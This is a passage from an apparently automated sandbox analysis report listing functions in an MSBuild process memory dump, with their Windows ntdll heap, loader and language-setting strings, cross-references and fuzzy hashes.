@, xrefs: 00FED49D
MachinePreferredUILanguages, xrefs: 00FED685
Control Panel\Desktop, xrefs: 00FED45D
PreferredUILanguagesPending, xrefs: 0104A8DE
@, xrefs: 00FED663
Control Panel\Desktop\MuiCached, xrefs: 00FED62B
@, xrefs: 00FED3E9

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 5761256bb5cb2e1ae962603314bcabc364e3cec60cf0931a07e1771aeb106444
Instruction ID: 49b1b251a5655d590c38a12c1673f5deec1883968e8c734b379743aa6e2557c7
Opcode Fuzzy Hash: 5761256bb5cb2e1ae962603314bcabc364e3cec60cf0931a07e1771aeb106444
Instruction Fuzzy Hash: 25B1AEB29083929FD711DF19C880B6BBBE8AB88754F05492EF9C9D7250D730DD449B92

Uniqueness

Uniqueness Score: -1.00%

Function 010A0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010A0E61, 010A0EC2, 010A0FD5, 010A105E, 010A1124, 010A1178
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 010A113D
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 010A0FE4
dedicated (%04Ix) free list element %p is marked busy, xrefs: 010A0ED1
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 010A106F
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 010A1192
HEAP[%wZ]: , xrefs: 010A0E54, 010A0EB5, 010A0FC8, 010A1051, 010A1117, 010A116B
Non-Dedicated free list element %p is out of order, xrefs: 010A0E6D

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: b22680585a3d7dc27a92e3211f08bb3bf605158be44c305d5a95fba81800a36c
Instruction ID: 04d56441dd23159838dd83397abc3180e525aca2fb4ab7486bcd6cd4d1359c6c
Opcode Fuzzy Hash: b22680585a3d7dc27a92e3211f08bb3bf605158be44c305d5a95fba81800a36c
Instruction Fuzzy Hash: 48F1143160068AEFDB25CFA8C441BEABBF5FF09704F448099F6C19B682C774A945DB51

Uniqueness

Uniqueness Score: -1.00%

Function 01089179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

%s\%ld\%s, xrefs: 0108948D
\AppContainerNamedObjects, xrefs: 010894AB, 010894B9
Global\Session\%ld%s, xrefs: 010894C5
BaseNamedObjects, xrefs: 01089477, 0108947C
\BaseNamedObjects, xrefs: 0108949E
%s\%u-%u-%u-%u, xrefs: 01089422
\Sessions, xrefs: 01089488
AppContainerNamedObjects, xrefs: 0108946E, 010894D6

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 5fab2d5d6e312a24b229d3139477323abbec46789c024222b1dcb533829be985
Instruction ID: 0d7aa669422e5e5ecfe909956215079872a96460682f9f15abdbfd879f3d41b9
Opcode Fuzzy Hash: 5fab2d5d6e312a24b229d3139477323abbec46789c024222b1dcb533829be985
Instruction Fuzzy Hash: 2ED1B27280C316AFD721FA588840BBBBBE8AFD8718F044969FAC49B250D774D944C796

Uniqueness

Uniqueness Score: -1.00%

Function 010A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 010A04D3
Just reallocated block at %p to %Ix bytes, xrefs: 010A05F1
HEAP: , xrefs: 010A03A6, 010A04B5, 010A05DD, 010A0682, 010A06D9
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 010A069F
RtlReAllocateHeap, xrefs: 010A02BF, 010A0362
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 010A06EA
About to reallocate block at %p to %Ix bytes, xrefs: 010A03BA
HEAP[%wZ]: , xrefs: 010A0399, 010A04A8, 010A05D0, 010A0675, 010A06CC

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 31672cac190c6ac230af5793a6b3e571c6d7b7b7e6f3bfb69ee48475a46d24ee
Instruction ID: 3846616a65f2c57c69baa0671cc34d781847f305010fda4f2dc71de790cb03e9
Opcode Fuzzy Hash: 31672cac190c6ac230af5793a6b3e571c6d7b7b7e6f3bfb69ee48475a46d24ee
Instruction Fuzzy Hash: EFD1023190068ADFDB22DFA9C441AAEBBF1FF49704F488099F5C59B256C739E980DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FED08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

Control Panel\Desktop\LanguageConfiguration, xrefs: 00FED196
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 00FED0CF
@, xrefs: 00FED313
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 00FED2C3
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 00FED146
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 00FED262
@, xrefs: 00FED0FD
@, xrefs: 00FED2AF

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 2f63044bfe1309108f72dc259dd32848571761007081bce0fa54855f6f5c2ea4
Instruction ID: 6a9a8fb025e05fdf362f612cab21a7b69c9fbc5931ee8aa8387a3589d910cd30
Opcode Fuzzy Hash: 2f63044bfe1309108f72dc259dd32848571761007081bce0fa54855f6f5c2ea4
Instruction Fuzzy Hash: 2DA16BB29083469FE721DF25C880B9BB7E8BB94725F00492EF6C997240D774D908DB53

Uniqueness

Uniqueness Score: -1.00%

Function 00FFADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON

Download Yara Rule

Strings

J, xrefs: 00FFAEAE
MUI, xrefs: 00FFB410
H, xrefs: 00FFAEC2
LdrpResSearchResourceMappedFile Enter, xrefs: 00FFAEB8
#, xrefs: 0105363D
MZER, xrefs: 010536A8
LdrpResSearchResourceMappedFile Exit, xrefs: 00FFAECC

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
API String ID: 0-664215390
Opcode ID: f6b5ea3defaa4118c7764e6f5f98cdf5de9a31ae3fc920b66d7b4be44053cfdf
Instruction ID: d410b638ee9ed4a29bd4330cd19c831c4131a676b3852c36615f15b0cc2bbb79
Opcode Fuzzy Hash: f6b5ea3defaa4118c7764e6f5f98cdf5de9a31ae3fc920b66d7b4be44053cfdf
Instruction Fuzzy Hash: B932AF71D0026D8BDB62CF14C894BFEB7B5BF44350F2440EAE949AB261DB359E81AF40

Uniqueness

Uniqueness Score: -1.00%

Function 01009EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON

Download Yara Rule

Strings

Internal error check failed, xrefs: 01057718, 010578A9
[%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 010576EE
sxsisol_SearchActCtxForDllName, xrefs: 010576DD
@, xrefs: 01009EE7
Status != STATUS_NOT_FOUND, xrefs: 0105789A
minkernel\ntdll\sxsisol.cpp, xrefs: 01057713, 010578A4
!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 01057709

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
API String ID: 0-761764676
Opcode ID: 995c4f3f1d5a69400668f5fd888ed932de6ae4576c660c5ccf11c7ce8b0d941e
Instruction ID: a48792af2ca8495433141385610c7f67424eed726df119b3f7602d32633e0e64
Opcode Fuzzy Hash: 995c4f3f1d5a69400668f5fd888ed932de6ae4576c660c5ccf11c7ce8b0d941e
Instruction Fuzzy Hash: A2128171A00229CBDB55DF58C881AFEB7F4FF08714F1580AAE989EB281E735D841DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FFEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

T, xrefs: 00FFEB4E
{, xrefs: 01054643
R, xrefs: 00FFEB62
, xrefs: 00FFF299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 00FFEB58
LdrpResSearchResourceInsideDirectory Exit, xrefs: 00FFEB6C

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 58b48bcd03dcb4767a9bc319d4b7567de57462847220c841a2c6f79c052261f5
Instruction ID: d73b11b6db4f2849f99fcbd2444a75b08be54bc19c23e535b6ec05d9d23d4d0f
Opcode Fuzzy Hash: 58b48bcd03dcb4767a9bc319d4b7567de57462847220c841a2c6f79c052261f5
Instruction Fuzzy Hash: BBA24D75E056298FDBA4DF18C8887AEBBB1AF45314F2441E9D94DA7260EB309EC5DF00

Uniqueness

Uniqueness Score: -1.00%

Function 00FEF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

((LONG)FreeEntry->Size > 1), xrefs: 0104E0B3
HEAP: , xrefs: 0104DF64, 0104E0A8, 0104E286, 0104E39E
(UCRBlock != NULL), xrefs: 0104DF6F
(LONG)FreeEntry->Size > 1, xrefs: 0104E291
HEAP[%wZ]: , xrefs: 0104DF57, 0104E09B, 0104E279, 0104E391
(!TrailingUCR), xrefs: 0104E3A9

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 0ba24a91d45a7ec8b43e88aeb1fa15ada7f644c0552a148ec78374ee5bda6c56
Instruction ID: 16b68598998d08d8b46faae60c84145572f71804acbdf62f3b04a4434fb7c1cf
Opcode Fuzzy Hash: 0ba24a91d45a7ec8b43e88aeb1fa15ada7f644c0552a148ec78374ee5bda6c56
Instruction Fuzzy Hash: 5D420D716083828FD715DF2AC884B6ABBE5BF94704F1849BDF4C58B292D738E845DB12

Uniqueness

Uniqueness Score: -1.00%

Function 0100B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

LdrpPreprocessDllName, xrefs: 01058403, 010584D7
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 010584D0
API set, xrefs: 010583F4, 010583F9
DLL %wZ was redirected to %wZ by %s, xrefs: 010583FC
minkernel\ntdll\ldrutil.c, xrefs: 0105840D, 010584E1
SxS, xrefs: 010583ED

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 30e4a02c308c1ca9503b0ef8b77ed9e7918c24aef7d72a7609defec0a4ca68a4
Instruction ID: aac7502b201878eac41c6442db9b65e800c57b5f6680f4cb14e7b40f1990c45e
Opcode Fuzzy Hash: 30e4a02c308c1ca9503b0ef8b77ed9e7918c24aef7d72a7609defec0a4ca68a4
Instruction Fuzzy Hash: 4AC16B34A002169BFB669B69C881BBFBBA5BF45300F14C0AAEDC19B2D1DB74CD44C791

Uniqueness

Uniqueness Score: -1.00%

Function 010263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 0106413A
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 010641FE
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 010640D8
minkernel\ntdll\ldrinit.c, xrefs: 010640E9, 0106414B, 0106420F, 01064269
_LdrpInitialize, xrefs: 010640DF, 01064141, 01064205, 0106425F
Delaying execution failed with status 0x%08lx, xrefs: 01064258

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 238ea66c99addc632606eff384d9bd8a7ccd844a3b286f96e9c1163f8f532307
Instruction ID: c1570a651f7fa6f7e83981b1da91456e963d22317c07a0caf70ae6a9649b2e29
Opcode Fuzzy Hash: 238ea66c99addc632606eff384d9bd8a7ccd844a3b286f96e9c1163f8f532307
Instruction Fuzzy Hash: A9912470B00326DBEB35DF59D844BAE7BE9BB50B18F140169E9C0AF2C1DB769841C791

Uniqueness

Uniqueness Score: -1.00%

Function 0109F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

RtlAllocateHeap, xrefs: 0109F56D
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 0109F7BE
HEAP: , xrefs: 0109F6F4, 0109F7A1, 0109F7F8
Just allocated block at %p for %Ix bytes, xrefs: 0109F708
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0109F809
HEAP[%wZ]: , xrefs: 0109F6E7, 0109F794, 0109F7EB

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: dd98067c1556c98dce6b9e66472718278fb3dbeece6287f1ffd2cd3bb5247bb4
Instruction ID: 7e15f440fe4c711ccbcd5e6d5d2dd53223be11a049d1fe146f2b5607273de32a
Opcode Fuzzy Hash: dd98067c1556c98dce6b9e66472718278fb3dbeece6287f1ffd2cd3bb5247bb4
Instruction Fuzzy Hash: F991CD31900686DFDF12DFA9C451AAEBFF1BF49704F14809DE585DB2A2C7399940EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FE645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

LdrpInitShimEngine, xrefs: 010499F4, 01049A07, 01049A30
Loading the shim user DLL failed with status 0x%08lx, xrefs: 01049A2A
Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 010499ED
minkernel\ntdll\ldrinit.c, xrefs: 01049A11, 01049A3A
apphelp.dll, xrefs: 00FE6496
Getting the shim user exports failed with status 0x%08lx, xrefs: 01049A01

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: aece2ec520077fc137057747448646535f9dff974c914a21de31b675a0305f91
Instruction ID: c7af4a6ac7f4aa426cb51a8b05798e707245c686c74a9f145404801bbfcd606e
Opcode Fuzzy Hash: aece2ec520077fc137057747448646535f9dff974c914a21de31b675a0305f91
Instruction Fuzzy Hash: 2251D2712083049FD721DF25C881BAB77E8FB98B48F04092AF5C59B2A1D735E904DB93

Uniqueness

Uniqueness Score: -1.00%

Function 0101F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010602E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010602BD
RTL: Re-Waiting, xrefs: 0106031E

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: ef82e5b4b030e6cb294241f992b976105f4b09273d00cd0d5314bc2d1fbf85d4
Instruction ID: a1c9fe9974042f4337046ffa40762c86b8a137c07a8705fa8294de912c944e8c
Opcode Fuzzy Hash: ef82e5b4b030e6cb294241f992b976105f4b09273d00cd0d5314bc2d1fbf85d4
Instruction Fuzzy Hash: 75E1CD706087429FD725CF28C884B6ABBE4BF88314F144A99F5E5CB2E5D778D849CB42

Uniqueness

Uniqueness Score: -1.00%

Function 01079C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON

Download Yara Rule

Strings

KnownDllPath, xrefs: 01079CF9
L, xrefs: 0107A2FB
\KnownDlls32, xrefs: 01079C67
AVRF: Verifier .dlls must not have thread locals, xrefs: 0107A12D
@, xrefs: 01079E80

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
API String ID: 0-3127649145
Opcode ID: f96046e87ee3eadfa4c194a726c6e5cccb3260a00eb271e21ffd2f347a006ebd
Instruction ID: 50cf0a5ae4c312105f77ca8c6939822025d5d635420dd4ee68cc1cadc32bdcdf
Opcode Fuzzy Hash: f96046e87ee3eadfa4c194a726c6e5cccb3260a00eb271e21ffd2f347a006ebd
Instruction Fuzzy Hash: 63325A70A0031ADBDB61DF65CC88B9AB7F8FF48304F1445EAE589A7250DB71AA84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01009950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON

Download Yara Rule

Strings

Internal error check failed, xrefs: 010576B2
, xrefs: 010099F1
, xrefs: 010099F9
Status != STATUS_SXS_SECTION_NOT_FOUND, xrefs: 010576A3
minkernel\ntdll\sxsisol.cpp, xrefs: 010576AD

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
API String ID: 0-3393094623
Opcode ID: 8aeabe7f30e4f72e463102aed124af602970a1d3d748b98ee356075dc473e51b
Instruction ID: f46898d43f8f877a9dc700d87296a7c846b70676df9f84248fd90e279f007420
Opcode Fuzzy Hash: 8aeabe7f30e4f72e463102aed124af602970a1d3d748b98ee356075dc473e51b
Instruction Fuzzy Hash: 75025E719087818FE762CF68C580B9BBBE5BF88718F44495EE9C987292D770D844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 010151EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Disallowed, xrefs: 01015352
Kernel-MUI-Number-Allowed, xrefs: 01015247
Kernel-MUI-Language-SKU, xrefs: 0101542B
Kernel-MUI-Language-Allowed, xrefs: 0101527B
WindowsExcludedProcs, xrefs: 0101522A

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 6eb431f7130b4101fea789e3847595e2ae70d325266d6710965959004ac8efe2
Instruction ID: fdc5c088b4ee3d1b51170578f3e8d3daec10195d826b052a5314427a75e8d759
Opcode Fuzzy Hash: 6eb431f7130b4101fea789e3847595e2ae70d325266d6710965959004ac8efe2
Instruction Fuzzy Hash: ACF15B72D00619EFDB12DF98C980EEEBBF9FF89650F11406AE581EB254D7749E008B90

Uniqueness

Uniqueness Score: -1.00%

Function 01074F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

/, xrefs: 01074F6D
\, xrefs: 01074F66
.Local, xrefs: 01075170
\microsoft.system.package.metadata\Application, xrefs: 01075158
.DLL, xrefs: 010750C7, 0107519C

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: 391b8f4952d247e51e8fc8e447559cbbc2e638506612fbd00d292756f1d10459
Instruction ID: 67be6e8bb645fe793138738a1a5588d2ad4496abd0e740ce57da444ab1140e75
Opcode Fuzzy Hash: 391b8f4952d247e51e8fc8e447559cbbc2e638506612fbd00d292756f1d10459
Instruction Fuzzy Hash: 4C91BE72E0061A8BCB21CF6CC881AEEB7F0EF49310F1941AAE985E7350D735D941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 010070C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01007C7C, 0100867F
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01007C96, 01008696
HEAP[%wZ]: , xrefs: 01007C6D, 01008670

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: e069b0f7a6c3ea12d99be493a1c56e2def365f47b9e06d629024c90b09c74451
Instruction ID: 860b7e4745da6a017098543535ce26fb534fe03493f2b7d7ea15d41fdbdc6b1d
Opcode Fuzzy Hash: e069b0f7a6c3ea12d99be493a1c56e2def365f47b9e06d629024c90b09c74451
Instruction Fuzzy Hash: 30139F70E00655DFEB66CF68C4907ADBBF1BF49304F1481AAD9C9AB382D734A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01001070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01055884
@, xrefs: 01055A53
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 0105588F
HEAP[%wZ]: , xrefs: 01055877

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: d264ce56e4b03e1b0b8cb488af2521fd87be008c906ab569e8ccf471e5da9a88
Instruction ID: 728b22f99cbcc2537ef7696928753ae603778658aac22109fa36818a001bd473
Opcode Fuzzy Hash: d264ce56e4b03e1b0b8cb488af2521fd87be008c906ab569e8ccf471e5da9a88
Instruction Fuzzy Hash: B0925C71A00269CFEB66CF18CC44BAAB7F5BF45314F0581EAE989A7291D7349E80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0100A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON

Download Yara Rule

Strings

SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01057D39
RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01057D03
SsHd, xrefs: 0100A885
SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01057D56

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
API String ID: 0-2905229100
Opcode ID: f04e0657f048acbb074af3993b5b0644440f6adb29a9d1e8ef0a8f2ebe0544d4
Instruction ID: b887ad96e72f7fa38a065b35b06fe3c8c3a227deb5d5dd6d8c794ba21589f2c9
Opcode Fuzzy Hash: f04e0657f048acbb074af3993b5b0644440f6adb29a9d1e8ef0a8f2ebe0544d4
Instruction Fuzzy Hash: E3D1B235B00319DFEB66CF98D9C06AEBBF5EF48310F1540A9E985AB391D3319981CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01003D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0100437C, 010045B4, 01004853
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01004393, 010045CB, 0100486D
HEAP[%wZ]: , xrefs: 0100436D, 010045A5, 01004844

Memory Dump Source

